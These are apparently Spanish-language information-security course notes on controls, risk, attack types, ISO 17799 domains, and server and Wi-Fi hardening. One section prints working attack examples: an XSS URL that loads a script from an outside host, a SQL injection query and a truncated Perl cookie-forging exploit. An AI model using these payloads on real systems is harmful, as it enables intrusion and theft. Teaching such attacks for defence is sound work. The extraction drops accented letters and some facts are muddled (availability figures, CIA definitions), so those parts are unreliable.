trabajando slo e independiente, pero lo que no podr ser posible ser la interconexin e
intercomunicacin de todos los centros de procesos de datos si es que no existen productos

compatibles y comunes.

CONTROLES TCNICOS ESPECFICOS

Son tan importantes como los Controles Tcnicos Generales para lograr la Operatividad de los
Sistemas. Encargndose de verificar el funcionamiento correcto de partes especficas del sistema,
como parmetros de asignacin automtica de espacio en el disco, los cuales pueden impedir su
uso posterior por una seccin diferente a la que lo gener. Segn las seguridades fsicas y lgicas
detalladas anteriormente se tiene:
Control de Acceso como seguridad fsica
El control de acceso no slo requiere la capacidad de identificacin, sino tambin asociarla a la
apertura o cerramiento de puertas, permitir o negar acceso basado en restricciones de tiempo,
rea o sector dentro de una empresa o institucin.
-

Utilizacin de Guardias
Utilizacin de Detectores de Metales
Utilizacin de Sistemas Biomtricos (identifican a la persona por lo que es manos, ojos,
huellas digitales y voz)
Proteccin Electrnica

Controles de Acceso como seguridad lgica

Estos controles pueden implementarse en el Sistema Operativo, sobre los sistemas de aplicacin,
en bases de datos, en un paquete especfico de seguridad o en cualquier otro utilitario.
Constituyen una importante ayuda para proteger al sistema operativo de la red, al sistema de
aplicacin y dems software de la utilizacin o modificaciones no autorizadas; para mantener la
integridad de la informacin (restringiendo la cantidad de usuarios y procesos con acceso
permitido) y para resguardar la informacin confidencial de accesos no autorizados.
Es conveniente tener en cuenta otras consideraciones referidas a la seguridad lgica, como por
ejemplo las relacionadas al procedimiento que se lleva a cabo para determinar si corresponde un
permiso de acceso (solicitado por un usuario) a un determinado recurso.
Al respecto, el National Institute for Standars and Technology (NIST, Instituto Nacional de
estndares y tecnologa) ha resumido los siguientes estndares de seguridad que se refieren a los
requisitos mnimos de seguridad en cualquier empresa:
-

Identificacin y Autentificacin
Roles
Transacciones
Limitaciones a los Servicios
Modalidad de Acceso
Ubicacin y Horario
Control de Acceso Interno

Control de Acceso Externo

Administracin

SEGURIDAD INFORMATICA
Existen varias razones por las que a todos los niveles no se le ha dado a suficiente importancia:
1.
2.
3.
4.

El riesgo y las consecuencias de ignorarlo eran mnimos

Siempre ha sido incomoda: mucho esfuerzo -> poco resultado
Los posibles ataques requeran muy altos niveles de conocimiento.
El acceso al conocimiento y a las redes era muy limitado

Qu es el riesgo?
Riesgo = vulnerabilidades * amenazas
Si no hay amenazas no hay riesgo Si no hay vulnerabilidades no hay riesgo
Factores que se consideraban fuentes de amenazas:

Preocupaciones y riesgos actuales

Si adems tenemos en cuenta que:

Hoy da todo esta conectado con todo

El nmero de usuarios de la red crece exponencialmente
Cada vez hay ms sistemas y servicios en la red

El nivel de riesgo es suficientemente alto como para empezar a pensar en la seguridad como algo
imprescindible

Tipos de ataques actuales:

Ataques hbridos
Son ataques en los que se mezclan ms de una tcnica:
DOS, DDOS, Exploits, Escaneos, Troyanos, Virus, Buffer Overflows, Inyecciones, etc.
Suelen ser de muy rpida propagacin y siempre se basan en alguna vulnerabilidad de algn
sistema.
Por ejemplo los gusanos Blaster, Sasser, o Slammer se propagaron por todo el planeta en cuestin
de pocas horas gracias a una mezcla de tcnicas de uso de vulnerabilidad, Buffer Overflows,
escaneado de direcciones, transmisin va Internet, y mimetizacin en los sistemas.
Como curiosidad: el 75% de los ataques tienen como teln de fondo tcnicas de Buffer Overflow
no podran ser evitadas?
Tipos de ataques actuales:
Ingeniera social
Son ataques en los que se intenta engaar a algn usuario para hacerle creer como cierto algo que
no lo es.
- Buenos das, es la secretaria del Director del Departamento?
-

Si digame, que desea?

Soy Pedro, tcnico informtico del Centro de Apoyo a Usuarios y me han avisado para
reparar un virus del ordenador del director pero la clave que me han indicado para entrar
no es correcta,

Otros ataques de este tipo son:

Farming
SPAM
Pishing
Cajeros automticos
ETC.

Ingeniera social
El ataque que ms preocupa hoy en da a las grandes organizaciones, sobre todo en el sector de
banca online es, con diferencia, el PISHING:

Qu preocupa y qu no en un proyecto de seguridad?

Existe un problema subyacente en la mente de TODOS los Directores de informtica de las grandes
compaas que nunca debemos olvidar si queremos tener xito en la implantacin de un sistema
de seguridad:
La compaa puede vivir sin seguridad pero no sin comunicaciones
Si un sistema de seguridad, por muy maravilloso que sea, destinado a evitar problemas que
pueden no haberse producido aun puede generar problemas
Nuevos, ese sistema NO SERA ACEPTADO.
Donde queda la criptografa en todo esto?
Los estndares actuales de cifrado de la informacin (AES, DES, RSA, MD5, etc., etc.) son
globalmente aceptados como buenos y suficientes en la mayora de los casos, quedando su
estudio reducidos a pocos entornos, Universidades, Fuerzas del Orden, Ministerios, etc.
La criptografa capta la atencin general pocas veces, pero cuando lo hace suele ser por algo serio,
cuando algn protocolo y/o algoritmo es reventado. Por ejemplo, WEP, el cifrado que usan las

redes WiFi basado en RC4 que puede ser descifrado si se consigue una captura de trfico
suficientemente grande.
El Coste de la seguridad
El esfuerzo tanto econmico como humano de los Departamentos de Seguridad debe buscar
siempre cuatro objetivos:
1. Disponibilidad: Se consideran sistemas aceptables a partir de dos nueves, esto es:
disponibles el 99,99% del tiempo. La inversin por cada nueve extra es siempre muy
elevada.
2. Confidencialidad: Seguridad keep the good giys in
3. Integridad: Seguridad Keep the bad guys out
4. Cumplimiento de la legalidad: LOPD, Sarbanes-Oxley, ISO17799
El esfuerzo econmico en seguridad es imposible de medir pero como ste debe ser siempre
proporcional al riesgo de perdidas, que SI ES MEDIBLE, si es posible hacer estimaciones razonables

Problemas colaterales de la seguridad

en las grandes compaas
1. Costes & ROI (Return of Investment)
1. Costes de personal
a. Difcil encontrar tcnicos cualificados
b. Muy alta rotacin en segn que sectores
2. Costes tecnolgicos: HW, SW, ROI
3. Costes ocultos (a menudo elevados)
4. Costes de cumplimiento de la legalidad (LOPD, Sarbanes-Oxley, etc)
5. Costes de cumplimiento de polticas y normativas
6. Costes de seguros (aprox. 25% de las compaas)

Problemas colaterales de la seguridad en las grandes compaas

2. De organizacin
Lleva mucho tiempo y esfuerzo conocer e integrar cualquier sistema de seguridad cuando hay
implicado ms de un departamento.
Se estima que 30 minutos de un Hacker pueden suponer una semana de trabajo de un ingeniero
con experiencia para reparar lo daado y prevenir nuevos incidentes
3. De garanta de disponibilidad
4. De garanta de ajuste a normativa y legalidad
Entonces Cunto se suele gastar en seguridad?

TECNOLOGAS
Qu tecnologas existen y cul es su estado actual?
Desde el punto de vista empresarial existen dos posibles enfoques para clasificar los sistemas de
seguridad:
1. Segn coste:
a. Software libre: Linux, Snort, Nessus, Ethereal, etc. Suele ser difcil implantar este
tipo de sistemas salvo que haya verdaderos problemas presupuestarios.
b. Sistemas propietarios: Microsoft, Sun, IBM, Symantec, ISS, Checkpoint, Trend, etc.
Gran calidad debida a la competencia
2. Desde el punto de vista de su utilidad:
a. Keep the good guys in: VPN, PKI, RAS, Radius, Tacacs+, Single Sing On, etc.
b. Keep the bad guys out: AntiVirus, FW, IPS, IDS, ADS, etc.
Qu grado de implantacin tiene cada una?

Cules son las tendencias actuales ?

Firewalls
Todas las compaas montan sistemas de filtrado de paquetes, bien mediante FireWalls, bien
mediante listas de control de acceso en routers.
Existen FW personales cuya utilidad suele cuestionarse (a favor de los IPS personales) Antivirus
Se montan siempre a dos niveles: a nivel de red (para filtrar correo electrnico principalmente) y a
nivel de puesto de trabajo.
IDS
Los sistemas de deteccin de intrusos han estado ayudando a detectar problemas en las redes
durante aos pero su incapacidad de detener los ataques que ellos mismos detectaban y la gran
cantidad de alarmas que generaban (imposibles de perseguir) han dado paso a los IPSs
IPS
Estn en pleno auge. Son capaces de detectar y detener tantos ataques conocidos como
desconocidos, detectar y detener virus, troyanos, aislar hackers cuando se les detecta y hasta
proteger a los otros elementos de seguridad de la red, por ejemplo a los Firewalls.
ADS
Sistemas de deteccin de anomalias. Son totalmente novedosos y an es pronto para hablar de
sus resultados reales.
Single Sign-on
Han sido, son y seguirn siendo de gran utilidad, mxime en las grandes empresas donde la gran
variedad de sistemas y claves a memorizar convierten los post-it junto a los monitores en algo
comn.
Control de acceso a red
Microsoft y Cisco estn en plena pugna por llevarse el gato al agua en lo que a control de acceso
a red se refiere y aunque recientemente anunciaron su intencin de colaborar, lo cierto es que
cada uno sigue por su lado, NAP, NAC el tiempo dir
VPN + PKI
Durante aos el binomio VPN + PKI han dominado el mundo de los accesos remotos seguros pero
la necesidad de instalar un cliente de VPN en el PC los ha hecho incmodos. Estn dejando paso a
marchas forzadas a las VPN + SSL.
VPN + SSL
Sin ms complejidad para el cliente que conectarse a una pgina web segura de la compaa para
poder entrar en ella va VPN. Sencillas, cmodas y ligeras. Existen ya sistemas basados en
appliances de red.

ROLES INVOLUCRADOS EN SEGURIDAD

USUARIOS
Usuarios comunes:
Los usuarios se acostumbran a usar la tecnologa sin saber como funciona o de los
riesgos que pueden correr.
Son el punto de entrada de muchos de los problemas crnicos.
Son El eslabn ms dbil en la cadena de seguridad.
2 enfoques para controlarlos:
Principio del MENOR PRIVILEGIO POSIBLE:
Reducir la capacidad de accin del usuario sobre los sistemas.
Objetivo: Lograr el menor dao posible en caso de incidentes.
EDUCAR AL USUARIO:
Generar una cultura de seguridad. El usuario ayuda a reforzar y aplicar los
mecanismos de seguridad.
Objetivo: Reducir el nmero de incidentes
CREADORES DE SISTEMAS
Creando Software:

El software moderno es muy complejo y tiene una alta probabilidad de contener

vulnerabilidades de seguridad.
Un mal proceso de desarrollo genera software de mala calidad. Prefieren que salga
mal a que salga tarde.
Usualmente no se ensea a incorporar requisitos ni protocolos de seguridad en los
productos de SW.
Propiedades de la Informacin en un Trusted System
Confidencialidad: Asegurarse que la informacin en un sistema de cmputo y la
transmitida por un medio de comunicacin, pueda ser leda SOLO por las personas
autorizadas.

 Autenticacin: Asegurarse que el origen de un mensaje o documento electrnico

esta correctamente identificado, con la seguridad que la entidad emisora o
receptora no esta suplantada.

Integridad: Asegurarse que solo el personal autorizado sea capaz de modificar la

informacin o recursos de cmputo.
No repudiacin: Asegurarse que ni el emisor o receptor de un mensaje o accin sea
capaz de negar lo hecho.
Disponibilidad: Requiere que los recursos de un sistema de cmputo estn
disponibles en el momento que se necesiten.
Ataques contra el flujo de la informacin
FLUJO NORMAL
Los mensajes en una red se envan a partir de un emisor a uno o varios
receptores
El atacante es un tercer elemento; en la realidad existen millones de
elementos atacantes, intencionales o accidentales.

Receptor

Emisor

Atacante

 INTERRUPCION
El mensaje no puede llegar a su destino, un recurso del sistema es destruido
o temporalmente inutilizado.
Este es un ataque contra la Disponibilidad
Ejemplos: Destruccin de una pieza de hardware, cortar los medios de
comunicacin o deshabilitar los sistemas de administracin de archivos.

Receptor

Emisor

Atacante
INTERCEPCION
Una persona, computadora o programa sin autorizacin logra el acceso a un
recurso controlado.
Es un ataque contra la Confidencialidad.
Ejemplos: Escuchas electrnicos, copias ilcitas de programas o datos,
escalamiento de privilegios.

Receptor

Emisor

Atacante

 MODIFICACION
La persona sin autorizacin, adems de lograr el acceso, modifica el
mensaje.
Este es un ataque contra la Integridad.
Ejemplos: Alterar la informacin que se transmite desde una base de datos,
modificar los mensajes entre programas para que se comporten diferente.

Receptor

Emisor

Atacante
FABRICACION
Una persona sin autorizacin inserta objetos falsos en el sistema.
Es un ataque contra la Autenticidad.
Ejemplos: Suplantacin de identidades, robo de sesiones, robo de
contraseas, robo de direcciones IP, etc...
Es muy difcil estar seguro de quin esta al otro lado de la lnea.

Receptor

Emisor

Atacante

GERENTES
Para que esperar
Si gastas ms dinero en caf que en Seguridad Informtica, entonces vas a ser
hackeado, es ms, mereces ser hackeado
La mayora de las empresas incorporan medidas de seguridad hasta que han tenido
graves problemas. para que esperarse?
Siempre tenemos algo de valor para alguien
Razones para atacar la red de una empresa:
$$$, ventaja econmica, ventaja competitiva, espionaje poltico, espionaje
industrial, sabotaje,
Empleados descontentos, fraudes, extorsiones, (insiders).
Espacio de almacenamiento, ancho de banda, servidores de correo (SPAM),
poder de cmputo, etc
Objetivo de oportunidad.
Siempre hay algo que perder:
Cunto te cuesta tener un sistema de cmputo detenido por causa de un incidente
de seguridad?
Costos econmicos (perder oportunidades de negocio).
Costos de recuperacin.
Costos de reparacin.
Costos de tiempo.
Costos legales y judiciales.
Costos de imagen.
Costos de confianza de clientes.
Perdidas humanas (cuando sea el caso).
Qu hacer?
Los altos niveles de la empresa tienen que apoyar y patrocinar las iniciativas de
seguridad.
Las polticas y mecanismos de seguridad deben de exigirse para toda la empresa.

 Con su apoyo se puede pasar fcilmente a enfrentar los problemas de manera

proactiva (en lugar de reactiva como se hace normalmente)
HACKER CRACKER
Cracking:
Los ataques son cada vez mas complejos.
Cada vez se requieren menos conocimientos para iniciar un ataque.
Mxico es un paraso para el cracking.
Por qu alguien querra introducirse en mis sistemas?
Por qu no? Si es tan fcil:
Descuidos
Desconocimiento
Negligencias (factores humanos).

Quienes atacan los sistemas?

Gobiernos Extranjeros.
Espas industriales o polticos.
Criminales.
Empleados descontentos y abusos internos.
Adolescentes sin nada que hacer

Niveles de Hackers:
Nivel 3: (ELITE) Expertos en varias reas de la informtica, son los que usualmente
descubren los puntos dbiles en los sistemas y pueden crear herramientas para
explotarlos.
Nivel 2: Tienen un conocimiento avanzado de la informtica y pueden obtener las
herramientas creadas por los de nivel 3, pero pueden darle usos ms preciso de
acuerdo a los intereses propios o de un grupo.
Nivel 1 o Script Kiddies: Obtienen las herramientas creadas por los de nivel 3, pero
las ejecutan contra una vctima muchas veces sin saber lo que estn haciendo.Son
los que con ms frecuencia realizan ataques serios.

Cualquiera conectado a la red es una vctima potencial, sin importar a que se dedique, debido a
que muchos atacantes slo quieren probar que pueden hacer un hack por diversin.
ADMINISTRADORES DE T.I.
ADMINISTRADORES DE TI:
Son los que tienen directamente la responsabilidad de vigilar a los otros roles.
(aparte de sus sistemas).
Hay actividades de seguridad que deben de realizar de manera rutinaria.
Obligados a capacitarse, investigar, y proponer soluciones e implementarlas.
Tambin tiene que ser hackers: Conocer al enemigo, proponer soluciones
inteligentes y creativas para problemas complejos.

Puntos Dbiles en los Sistemas

Qu se debe asegurar ?
Siendo que la informacin debe considerarse como un recurso con el que cuentan las
Organizaciones y por lo tanto tiene valor para stas, al igual que el resto de los activos, debe estar
debidamente protegida.
Contra qu se debe proteger la Informacin ?
La Seguridad de la Informacin, protege a sta de una amplia gama de amenazas, tanto de orden
fortuito como destruccin, incendio o inundaciones, como de orden deliberado, tal como fraude,
espionaje, sabotaje, vandalismo, etc.

 Qu se debe garantizar?
Confidencialidad: Se garantiza que la informacin es accesible slo a
aquellas personas autorizadas a tener acceso a la misma.

Integridad: Se salvaguarda la exactitud y totalidad de la informacin y los

mtodos de procesamiento.

Disponibilidad: Se garantiza que los usuarios autorizados tienen acceso a la

informacin y a los recursos relacionados con la misma toda vez que se
requiera.

Porqu aumentan las amenazas?

Las Organizaciones son cada vez mas dependientes de sus Sistemas y Servicios de Informacin,
por lo tanto podemos afirmar que son cada vez mas vulnerables a las amenazas concernientes a su
seguridad. Algunas causas son:
Crecimiento exponencial de las Redes y Usuarios Interconectados
Profusin de las BD On-Line
Inmadurez de las Nuevas Tecnologas
Alta disponibilidad de Herramientas Automatizadas de Ataques
Nuevas Tcnicas de Ataque Distribuido (Ej:DDoS)
Tcnicas de Ingeniera Social
Cules son las amenazas?
Accidentes: Averas, Catstrofes, Interrupciones.
Errores: de Uso, Diseo, Control.
Intencionales Presenciales: Atentado con acceso fsico no autorizado.
Intencionales Remotas: Requieren acceso al canal de comunicacin.
Interceptacin pasiva de la informacin (amenaza a la
CONFIDENCIALIDAD).
Corrupcin o destruccin de la informacin (amenaza a la
INTEGRIDAD).
Suplantacin de origen (amenaza a la AUTENTICACIN)
Cmo resolver el desafo de la seguridad informtica?

Las tres primeras tecnologas de proteccin ms utilizadas son el control de

acceso/passwords (100%), software anti-virus (97%) y firewalls (86%)
Los ataques ms comunes durante el ltimo ao fueron los virus informticos (27%)
y el spammimg de correo electrnico (17%) seguido de cerca (con un 10%) por los
ataques de denegacin de servicio y el robo de notebook:
El problema de la Seguridad Informtica est en su Gerenciamiento y no en las tecnologas
disponibles

Internas

Amenazas

Externas

Proteccin de la Informacin
Confidencialidad
Integridad
Disponibilidad
Aspectos Legales

Requerimiento bsico

Apoyo de la Alta Gerencia

RRHH con conocimientos y experiencia

RRHH capacitados para el da a da

Recursos Econmicos

Tiempo

Anlisis de Riesgos

Se considera Riesgo Informtico, a todo factor que pueda generar una

disminucin en:

Confidencialidad Disponibilidad - Integridad

Determina la probabilidad de ocurrencia

Determina el impacto potencial

Modelo de Gestin

Activos

Amenazas

Impactos

Vulnerabilidades

Reduce

Riesgos

Funcin
Correctiva

Reduce
Funcin
Preventiva

Poltica de Seguridad:

Conjunto de Normas y Procedimientos documentados y comunicados, que tienen por objetivo

minimizar los riesgos informticos mas probables

Uso de herramientas
Involucra
Cumplimiento de Tareas por parte de
personas

Plan de Contingencias

Conjunto de Normas y Procedimientos documentados y comunicados, cuyo objetivo es recuperar

operatividad mnima en un lapso adecuado a la misin del sistema afectado, ante emergencias
generadas por los riesgos informticos
Involucra

Uso de herramientas

Cumplimiento de Tareas por parte de personas

Control por Oposicin

Auditora Informtica Interna capacitada

Equipo de Control por Oposicin Formalizado

Outsourcing de Auditora

Herramientas:

Copias de Resguardo

Control de Acceso

Encriptacin

Antivirus

Barreras de Proteccin

Sistemas de Deteccin de Intrusiones

Uso de Estndares

Norma ISO/IRAM 17.799

Estndares Internacionales
-

Norma basada en la BS 7799

Homologada por el IRAM

ORGANIZACION DE LA SEGURIDAD

Infraestructura de la Seguridad de la Informacin

Seguridad del Acceso de terceros

Servicios provistos por otras Organizaciones

CLASIFICACION Y CONTROL DE BIENES

Responsabilidad de los Bienes

Clasificacin de la Informacin

SEGURIDAD DEL PERSONAL

Seguridad en la definicin y la dotacin de tareas

Capacitacin del usuario

Respuesta a incidentes y mal funcionamiento de la Seguridad

SEGURIDAD FISICA Y AMBIENTAL

reas Seguras

Seguridad de los Equipos

Controles generales

GESTION DE LAS COMUNICACIONES Y LAS OPERACIONES

Procedimientos operativos y responsabilidades

Planificacin y aceptacin del Sistema

Proteccin contra el software maligno

Tares de acondicionamiento

Administracin de la red

Intercambio de informacin y software

CONTROL DE ACCESO

Requisitos de la Organizacin para el control de acceso

Administracin del acceso de usuarios

Responsabilidades de los usuarios

Control de acceso de la Red

Control de acceso al Sistema Operativo

Control de acceso de las Aplicaciones

Acceso y uso del Sistema de Monitoreo

Computadoras mviles y trabajo a distancia

DESARROLLO Y MANTENIMIENTO DE LOS SISTEMAS

Requisitos de Seguridad de los Sistemas

Seguridad de los Sistemas de Aplicacin

Controles Criptogrficos

Seguridad de los archivos del Sistema

Seguridad de los procesos de desarrollo y soporte

DIRECCION DE LA CONTINUIDAD DE LA ORGANIZACION

Aspectos de la direccin de continuidad de la Organizacin

CUMPLIMIENTO

Cumplimiento con los requisitos legales

Revisin de la Poltica de seguridad y del Cumplimiento Tcnico

Consideracin de las Auditoras del Sistema

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Ataques Internos
- Premeditacin (Empleados mal intencionados o ex empleados con informacin privilegiada)
- Descuido
- Ignorancia
- Indiferencia de las politicas de seguridad
Ataques externos
-

- Hackers, Crackers, Lammers, Script-Kiddies

- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.

Ataques Internos

Suplantacin de identidad

Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR)

Robo de informacin (Ej: para la competencia)

Virus, Troyanos, Gusanos

Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc

Keylogging - Keycatching

Keycatcher:

Ataques Externos

Ataques contra servicios WEB

Cross Site Scripting (XSS)

SQL Injection

Exploits

Robo de Identidad

Denegacin de Servicio (DoS) y Denegacin de Servicio Distribuido (DDoS)

SPAM

VIRUS

Phishing (Whishing, Hishing)

Troyanos

XSS:
http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='http:
//h4k.in/i.js';document.body.appendChild(a);//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E

SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM
admin_login-Ejemplo de un exploit en PERL:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl <host name>\n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0;
path=/;");
$t = $resp->content;
#print $t;
";
COMO NOS DEFENDEMOS?
Debemos crear una lista de mandamientos que debemos seguir al pie de la letra.
No olvidarse que el hecho de no cumplir con alguno de estos mandamientos inevitablemente
caeremos en un mayor riesgo para los servicios que queremos proteger.
LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD
Siempre respetar las polticas de seguridad
Siempre tener nuestros servicios actualizados a la ltima versin conocida estable
Utilizar mecanismos de criptografa para almacenar y transmitir datos sensibles
Cambiar las claves cada cierto tiempo
Auto-auditar nuestros propios servicios. Autoatacarnos para saber si somos o no
vulnerables

 Estar siempre alerta. Nunca pensar a nosotros nadie nos ataca.

No dejar respaldos con informacin sensible en directorios web
No usar las mismas claves para servicios distintos (ej, la clave de root sea la misma que la
de MySQL)
SERVICIOS DE INTERNET
- Cambiar los puertos por defecto
- Garantizar el acceso solo a cuentas especficas
- Aplicar tcnicas de Hardening
- Para servicios privados y confidenciales utilizar tneles seguros (VPN cifradas) en Internet y
redes no seguras
- Eliminar todos los banners posibles y sobre todo las versiones
- Habilitar mdulos de seguridad (Ej mod_security en Apache)
- Levantar Firewalls e IDS/IPS
- Crear cuentas de sistema restringidas (aunque no tengan privilegios)
SERVICIOS DE INTERNET
- Nunca trabajar con root si no es estrictamente necesario
- Proteger con doble contrasea si es posible
- Elegir contraseas seguras, mezclando maysculas, minsculas, nmeros y caracteres
especiales. Las claves no deben ser palabras coherentes (ej: Admin25)
- Cerrar puertos y eliminar aplicaciones innecesarias
- Borrar robots.txt y estadsticas pblicas
- Proteger las URL (ej: mod_rewrite)
SERVICIOS DE INTERNET
Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:
index.php~ (terminados en caracter squiggle o pigtail (literalmente: cola de chancho)
- Realizar respaldos peridicamente y probar que funcionen
- Conocer las tcnicas de ataque ms conocidas
- Auditar los cdigos con herramientas de seguridad

- Si ejecutan algn servidor de base de datos, permitir solamente comunicacin con interfaz
loopback y no dejar sin contrasea las bases de datos.
- En lo posible no utilizar servicios como:
- WEBMIN
- phpMyAdmin
- Interfaces WEB en routers o dispositivos de red
UN POCO MAS DE SEGURIDAD CON APACHE Y PHP
Apache. En httpd.conf activar las siguientes directivas:
ServerTokens Prod
ServerSignature Off
ServerAdmin <direccion@decorreo.com>
habilitar mod_security y mod_rewrite
PHP .En php.ini
php_expose=off
esconde php
mode_safe=on
evita que se ejecuten funciones como system(), passthru(), exec(), etc.
evitar scripts con phpinfo();
Algunos ejemplos:

Direccin: http://www.sitioweb.com/config.php

<?php
/*Variables base de datos*/
$sys['db_host'] = "localhost";
$sys['db_username'] = "root";
$sys['db_password'] = "123";
$sys['db_database'] = "base_de_datos";
echo "<center>ESTA PAGINA ES PRIVADA";
?>

PROTECCIN DE REDES WI-FI

EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN EXTENSIN FSICA (No hay cables) LO QUE
CONLLEVA A QUE SEA MS FCIL ACCEDER A ELLAS REMOTAMENTE
EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR PARA REDUCIR EL RIESGO DE ATAQUES.

Apagar el router o access point cuando no se ocupe

Nunca entregar la clave Wi-Fi a terceros

Utilizar claves de tipo WPA2. Como segunda opcin WPA y en el peor de los casos WEP
(128 y 64 bits)

Habilitar el control de acceso por MAC. Son fciles de clonar pero pone una barrera ms

Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH, etc)

Deshabilitar el acceso inalmbrico a la configuracin

Cambiar los puertos por defecto de los servicios necesarios en el router (ej: http a 1000)

Desactivar el broadcasting SSID

Desactivar DHCP. Utilizar slo IP manuales dentro de rangos poco convencionales. (Ej:
90.0.10.0 90.0.10.254)

Usar VPN si fuese posible.

Cambiar regularmente las claves Wi-Fi (tanto administracin como clave de red).

Guardar bien las claves de administracin

Usar contraseas complicadas. (Ej: E_aR@_1-x

No usar dispositivos Wi-Fi cerca de hornos microondas ni telfonos inalmbricos

Realizar un scaneo local de las redes disponibles para evitar interferencias.

LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11

HERRAMIENTAS DE SEGURIDAD COMERCIALES

GFI LANGUARD SECURITY SCANNER www.gfi.com

N-Stalker (ex N-Stealth) www.nstalker.com

ACUNETIX WEB SCANNER www.acunetix.com

HERRAMIENTAS DE SEGURIDAD GRATIS

NMAP (Network Mapper) www.insecure.org/nmap

NESSUS www.nessus.org